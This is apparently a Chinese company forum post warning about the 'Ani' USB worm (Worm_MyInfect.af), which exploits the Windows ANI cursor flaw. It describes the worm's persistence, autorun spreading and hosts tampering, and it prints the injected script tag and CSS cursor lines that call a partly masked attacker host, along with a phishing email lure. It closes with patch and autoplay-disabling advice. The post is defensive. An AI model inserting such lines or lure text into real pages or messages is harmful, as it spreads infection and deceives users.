蠕虫“艾妮”最新U盘病毒大家小心

sqnetwork

[h1]最近发现本公司几个U盘都中了“艾妮”蠕虫病毒所以请大家在使用U盘的时候一定要注[/h1]
“艾妮”复合型病毒。该病毒通过微软Windows系统ANI（动态光标）文件处理的漏洞、感染正常的可执行文件和本地网页文件、发送电子邮件、和感染优盘及及移动存储介质等途径进行传播，病毒自我传播能力很强。并且感染该病毒后，会自动下载运行木马程序，造成较大危害。

  该蠕虫先后出现很多变种，在出现后的短时期内迅速传播，遭受感染的用户难于彻底清除，给其工作带来诸多不便。
蠕虫情况分析如下：

  病毒名称：Worm_MyInfect.af
  中 文 名：“艾妮”
  其他名称：I-Worm/AniLoad（江民）
       　Worm.MyInfect （金山）
        Worm.DlOnlineGames （瑞星）
  病毒类型：复合型
  感染系统：Windows 9X/ Windows ME/ Windows NT/ Windows 2000/
        Windows XP/ Windows 2003/ Windows Vista

  病毒特性：

    1、生成病毒文件

    病毒运行后，复制自身到下面目录：%SysDir%\\sysload3.exe


    2、 修改注册表项

    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    \"System Boot Check\"=\"%SysDir%\\sysload3.exe\"这样，病毒就可以        随Windows系统启动自动运行。


    3、感染系统中文件

    它能感染本地磁盘和网络共享目录中的可执行文件和脚本文件。
    1） 感染可执行文件
    将被感染文件和病毒融合成一个文件(被感染文件贴在病毒文件尾部)完成感
    染。
    2） 脚本类文件
    在这些脚本文件尾加上如下注示 <script src=http:// ****.microfsot.     com/Noindex.js></script>
    下载该脚本文件，里面含有如下代码：
    <DIV style=\"CURSOR: url(&#39;http://****.microfsot.com/*.jpg&#39;)\">
    <DIV style=\"CURSOR: url(&#39;http://****.microfsot.com/*.jpg&#39;)\">
    以上两个图片链接利用了ANI漏洞，图片文件中含有溢出攻击代码，因此打
    开上面的Noindex.js网页时便会中毒。

    4、下载指定网址文件

    从指定网址下载木马程序和病毒升级程序。

    5、通过电子邮件传播

    病毒邮件特征如下：
    发件人： i_love_cq@sohu.com
    主题：你和谁视频的时候被拍下的？给你笑死了！
    正文：
    看你那小样！我看你是出名了！
    你看这个地址！你的脸拍的那么清楚！你变明星了！
    http://****.microfsot.com/***/134952.htm
    如果用户点击了以上带有病毒的网页，就会遭受感染。

    6、其它
    遍历a-z的所有驱动器，如果该驱动器为“可移动存储”就在该驱动器上创
    建AUTORUN.INF，来达到传播自己的目的。检测软驱，若存在则复制病毒文
    件到其中文件名为tool.exe，并生成autorun.inf文件，使病毒可以自动运
    行，以传播自身。
    修改hosts文件，屏蔽多个网址。这些网址大多是以前用来传播其他病毒的
    站点。
   


  解决方法：

    1、对没有遭受感染的计算机用户，应该尽快安装微软公司最新操作系统补
    丁（KB925902），并及时升级系统中的防病毒软件，同时打开防病毒软件的
    “实时监控”功能。

    2、对已经感染变种的计算机用户，建议尽快下载专杀工具进行查杀修复工
    作。并安装微软公司最新操作系统补丁（KB925902）。

     专杀工具下载链接地址：

http://download.jiangmin.info/jmsoft/ANIWormKiller.exe （江民公司）

    微软公司相关补丁下载地址：

http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx

  安全建议：

    1、局域网的计算机用户尽量避免创建可写的共享目录，已经创建共享目录
　　　的应立即停止共享。

    2、如无必要，Windows 2000/XP用户应尽量关闭IPC$共享，并给具有管理员 　　　权限的帐号设置复杂的密码。

　　　　3、及时安装微软的安全更新，不要随意访问来源不明的网站。

　　　　4、计算机系统安装防病毒软件，并及时升级病毒定义库。

　　　　5、计算机用户使用U盘等移动设备交换文件时，务必开启杀毒软件的“实时
　　　监控”功能，或先用防病毒软件扫描，并关闭自动播放功能。

　　　　6、用户应慎用操作系统默认提供的“自动播放”功能，防止在使用移动存
　　　储介质过程中受到感染。用户可以在超级用户权限下按如下方法关闭该功能：

　　　　Windows XP用户：
　　　　“开始”－＞“运行”－＞输入“gpedit.msc”确定后打开“组策略”；
　　　　依次打开：“计算机配置”－＞“管理模板”－＞单击“系统”项；
　　　　在右边设置中有一项“关闭自动播放”，双击打开其属性；
　　　　选择“己启用”在属性框中选中所有驱动器，点击“确定”；
　　　　同理再打开： “用户配制”－＞“管理模板”－＞单击“系统”项；
　　　　在右边设置中有一项“关闭自动播放”，双击打开属性；
　　　　选择“己启用”在属性框中选中所有驱动器，点击“确定”；
　　　　即可关闭自动播放。

　　　　注：Windows 2000用户打开“组策略”方法是，“开始”－＞“运行”－＞
　　　　输入“mmc”－＞单击确定，打开控制台，选择“控制台”菜单中“添加/删
　　　　除管理单元”，单击“添加”，选择“组策略”－＞添加